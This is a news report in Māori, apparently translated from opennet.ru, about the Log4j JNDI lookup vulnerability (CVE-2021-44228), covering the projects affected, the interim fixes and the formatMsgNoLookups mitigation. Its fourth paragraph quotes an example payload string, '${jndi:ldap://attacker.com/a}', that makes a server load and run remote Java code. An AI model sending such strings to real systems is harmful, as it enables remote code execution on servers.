I roto i te Apache Log4j, he anga rongonui mo te whakarite takiuru i roto i nga tono Java, kua kitea he whakaraeraetanga nui e taea ai te mahi i te waehere kawa ka tuhia he uara whakahōputu motuhake ki te whakatakotoranga "{jndi:URL}" ki te rangitaki. Ka taea te whakaeke i runga i nga tono Java e tuhi ana i nga uara i whakawhiwhia mai i nga puna o waho, hei tauira, i te wa e whakaatu ana i nga uara raru ki nga karere hapa.
E kiia ana ko te nuinga o nga kaupapa e whakamahi ana i nga anga penei i a Apache Struts, Apache Solr, Apache Druid, Apache Flink ranei e pa ana ki te raru, tae atu ki te Steam, Apple iCloud, nga kaihoko me nga kaitoro Minecraft. Ko te whakaaro ko te whakaraeraetanga ka arahi ki te ngaru o nga whakaeke nui ki nga tono umanga, ka whakahoki ano i te hitori o nga whakaraeraetanga tino nui i roto i te anga Apache Struts, e ai ki te whakatau tata, e whakamahia ana i roto i nga tono paetukutuku e 65% o Fortune. 100 kamupene me nga ngana ki te matawai i te whatunga mo nga punaha whakaraerae.
Ka kaha ake te raru na te mea kua whakaputahia he mahi mahi, engari kaore ano kia whakahiatohia nga whakatikatika mo nga manga pumau. Ko te tohu tohu CVE kaore ano kia tohua. Ko te whakatika kei roto noa i te peka whakamatautau log4j-2.15.0-rc1. Hei mahi mo te aukati i te whakaraeraetanga, ka tūtohu kia tautuhia te tawhā log4j2.formatMsgNoLookups ki te pono.
I puta te raru i te mea e tautoko ana a log4j ki te tukatuka i nga kopare motuhake "{}" i roto i nga raina whakaputa ki te raarangi, e taea ai nga uiui JNDI (Java Naming and Directory Interface) te mahi. Ka huri te whakaeke ki te tuku aho me te whakakapinga "${jndi:ldap://attacker.com/a}", i runga i te tukatuka ka tukuna e log4j he tono LDAP mo te ara ki te akomanga Java ki te tūmau attacker.com . Ko te ara i whakahokia mai e te tūmau o te kaitukituki (hei tauira, http://second-stage.attacker.com/Exploit.class) ka utaina, ka mahia i roto i te horopaki o te tukanga o naianei, e taea ai e te kaitukino te whakahaere i te waehere i runga i te pūnaha me nga mana o te tono o naianei.
Tāpiritanga 1: Kua tohua te whakaraeraetanga ko te tohu tohu CVE-2021-44228.
Tāpiritanga 2: Kua tautuhia he huarahi ki te karo i te whakamarutanga i tapirihia e te tuku log4j-2.15.0-rc1. He whakahou hou, log4j-2.15.0-rc2, kua tukuna me te tino whakamarumaru ki te whakaraerae. Ko te waehere e whakaatu ana i te huringa e pa ana ki te kore o te whakakorenga rereke i roto i te keehi o te whakamahi i tetahi URL JNDI he te whakahōputuhia.
Source: opennet.ru